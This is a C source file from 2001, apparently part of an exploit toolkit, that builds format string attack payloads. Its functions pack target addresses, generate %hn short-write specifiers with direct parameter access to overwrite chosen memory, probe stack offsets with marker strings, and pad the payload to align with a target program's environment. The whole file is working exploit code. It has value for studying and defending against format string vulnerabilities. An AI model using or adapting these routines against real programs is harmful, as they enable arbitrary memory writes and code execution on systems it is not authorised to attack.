/*
 * fmtstr.c - routines for format string creation.
 *
 * Copyright (c) 2001 - fish stiqz <fish@analog.org>
 */

#include <stdio.h>
#include <stdlib.h>
#include <string.h>

#include "common.h"
#include "fmtstr.h"

/*
 * returns true if the value contains a null byte.
 */
int has_zeros(unsigned long value)
{
    if((value & 0x000000ff) == 0x0 || (value & 0x0000ff00) == 0x0 ||
       (value & 0x00ff0000) == 0x0 || (value & 0xff000000) == 0x0)
	return 1;

    else
	return 0;
}

/*
 * compares two short_write_t structures.
 */
int comp_element(short_write_t *first, short_write_t *second)
{
    return first->value - second->value;
}


/*
 * returns the number of elements int the short_write_t array.
 */
unsigned int sw_array_size(short_write_t shorts[])
{
    unsigned int i = 0;
    
    while(shorts[i].value != 0 || shorts[i].address != 0)
	i++;

    return i;
}

/*
 * prints all the elements int the array.
 */
void print_elements(short_write_t shorts[])
{
    unsigned int i = 0;

    while(shorts[i].value != 0 || shorts[i].address != 0)
    {
	printf("%#hx:\t%#lx\n", shorts[i].value, shorts[i].address);
	i++;
    }
}

/*
 * sorts all elements with qsort(), which sorts in ascending order.
 */
void sort_shorts(short_write_t shorts[])
{
    unsigned int num_elem = sw_array_size(shorts);

#ifdef DEBUG
    print_elements(shorts);
    printf("------------------\n");
#endif
    qsort(shorts, num_elem, sizeof(short_write_t), (void *)comp_element);
#ifdef DEBUG
   print_elements(shorts);
#endif
}

/*
 * Makes a format string which uses short writes and direct parameter 
 * access.  The fourth argument is a function that calculates the size of
 * the address buffer, if this is NULL, it will assume sizeof(u_long) * elems.
 */
char *mkfmtstr_short(short_write_t shorts[], unsigned int eats, unsigned int initial,
		     unsigned int (*size_addrbuf)(char *))
{
    unsigned int num_writes = sw_array_size(shorts);
    unsigned int i = 0;
    unsigned int len = initial;
    char *addrbuf = Malloc(((num_writes * sizeof(unsigned long)) + 1) * sizeof(char));
    char *convbuf = Malloc(((num_writes * 25) + 1) * sizeof(char));
    char *fmt_str;
    char asegment[sizeof(unsigned long) + 1];
    char csegment[25];
   
    sort_shorts(shorts);

    memset(addrbuf, 0x0, ((num_writes * sizeof(unsigned long)) + 1) * sizeof(char));
    memset(convbuf, 0x0, ((num_writes * 25) + 1) * sizeof(char));

    /* create the address buffer */
    for(i = 0; i < num_writes; i++)
    {
	memset(asegment, 0x0, sizeof(asegment));

	if(has_zeros(shorts[i].address))
	{
	    fprintf(stderr, "address has zero bytes, aborting\n");
	    return NULL;
	}
	
	memcpy(asegment, (char *)&shorts[i].address, sizeof(unsigned long));
	strcat(addrbuf, asegment);
    }

    /* add in the number of bytes the address buffer will represent */
    if(size_addrbuf != NULL)
	len += size_addrbuf(addrbuf);
    else
	len += (num_writes * sizeof(unsigned long));

    /* create the conversion specifier buffer */
    for(i = 0; i < num_writes; i++)
    {
	memset(csegment, 0x0, sizeof(csegment));
	
	if(len > shorts[i].value)
	{
	    fprintf(stderr, "cannot write %#hx, len too large\n", shorts[i].value);
	    free(addrbuf);
	    free(convbuf);
	    return NULL;
	}

	if(shorts[i].value - len != 0)
	    snprintf(csegment, sizeof(csegment), "%%%uc%%%u$hn", 
		     shorts[i].value - len, eats++);
	else
	    snprintf(csegment, sizeof(csegment), "%%%u$hn", eats++);
	
	len += shorts[i].value - len;
	strcat(convbuf, csegment);
    }

    fmt_str = Malloc((strlen(addrbuf) + strlen(convbuf) + 1) * sizeof(char));
    strcpy(fmt_str, addrbuf);
    strcat(fmt_str, convbuf);
    
    free(addrbuf);
    free(convbuf);

    return fmt_str;
}
    

/*
 * useful for finding a stack eat range.. 
 */
char *mkfmtstr_disp(unsigned long target, unsigned long value, unsigned int eats)
{
    char *fmt_str = Malloc(300 * sizeof(char));
    char *addrbuf = Malloc(((2 * sizeof(unsigned long)) + 1) * sizeof(char));
    unsigned long dest_addr[2];
    char smfmt[50];

    dest_addr[0] = target;
    dest_addr[1] = target + 2;

    if(has_zeros(dest_addr[0]) || has_zeros(dest_addr[1]))
    {
	fprintf(stderr, "address has zero bytes, aborting\n");
	return NULL;
    }

    memset(addrbuf, 0x0, ((2 * sizeof(unsigned long)) + 1) * sizeof(char));
    memcpy(addrbuf, (char *)&dest_addr[0], sizeof(unsigned long));
    memcpy(addrbuf + sizeof(unsigned long), (char *)&dest_addr[1],
	   sizeof(unsigned long));

    memset(fmt_str, 0x0, 300);    
    strcat(fmt_str, addrbuf);
    free(addrbuf);

    snprintf(smfmt, sizeof(smfmt), "%%8x___%%%u$8x_%%8x___%%%u$8x", eats, eats+1);
    strcat(fmt_str, smfmt);

    return fmt_str;
}
	
/*
 * useful for showing some of the 'eaten' values and finding
 * the appropriate number of stack eats.
 */
char *mkfmtstr_eat(unsigned int eats)
{
    char *fmt_str = Malloc(300 * sizeof(char));
    unsigned int i = 0, limit = 255 - 4 - 16;
    char smfmt[50];

    memset(fmt_str, 0x0, 300);
    strcat(fmt_str, "AAAABBBB");

    while(strlen(fmt_str) + i < limit)
    {
	snprintf(smfmt, sizeof(smfmt), "%%%u$8x_", eats++);
	i = strlen(smfmt);
	strcat(fmt_str, smfmt);
    }

    return fmt_str;
}


/*
 * Just addes x number of 'X' characters to the end of the
 * format string, reallocating as many bytes as needed.
 */
char *add_align(char *fmtstr, unsigned int align)
{
    fmtstr = Realloc(fmtstr, (strlen(fmtstr) + 1 + align) * sizeof(char));
    memset(fmtstr + strlen(fmtstr), 'X', align);

    return fmtstr;
}


/*
 * properly aligns the format string.
 *  - this method courtesy of Michel "MaXX" Kaempf (Thanks dawg ;-)
 */
char *create_proper_align(char *bin, char **execve_envs, char *fmtstr,
                          unsigned long stack)
{
    unsigned long file_addr;
    unsigned int x, align;

    file_addr = stack - (strlen(bin) + 1);
    for(x = 0; execve_envs[x] != NULL; x++)
        file_addr -= strlen(execve_envs[x]) + 1;

    file_addr -= strlen(fmtstr) + 1;
    for(align = 0; align < (file_addr % 16); align++);

    print_msg("alignment calculated: %u\n", align);

    fmtstr = add_align(fmtstr, align);
    return fmtstr;
}
